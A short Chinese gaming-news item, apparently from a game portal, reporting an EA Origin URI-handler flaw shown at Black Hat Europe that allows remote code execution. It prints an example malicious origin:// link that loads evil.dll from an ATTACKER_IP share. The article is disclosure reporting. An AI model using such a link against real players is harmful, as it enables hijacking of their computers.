EA Origin平台漏洞允许攻击者劫持玩家电脑
在Black Hat Europe大会上,安全研究人员发现了一个影响4千万Origin玩家的漏洞,该漏洞允许攻击者在玩家电脑上远程执行恶意代码。 问题与EA Origin在玩家电脑上启动游戏的统一资源标识符有关。研究人员演示了如何控制一台安装 Crysis 3和Origin客户端的电脑: 通常Origin是使用origin://LaunchGame/71503链接启动游戏,但如果目标用户点击了链接origin: //LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll,Origin将会载入攻击者选择的Windows动态链接库文件。这个漏洞与去年发现的Steam漏洞相似(也是与Steam:// URL有关)。 (更多游戏资讯请访问叶子猪游戏资讯中心:http://news.yzz.cn/) [编辑:必杀技]
|
本文由叶子猪游戏资讯中心首发,仅代表发表厂商及作者观点,不代表叶子猪本身观点!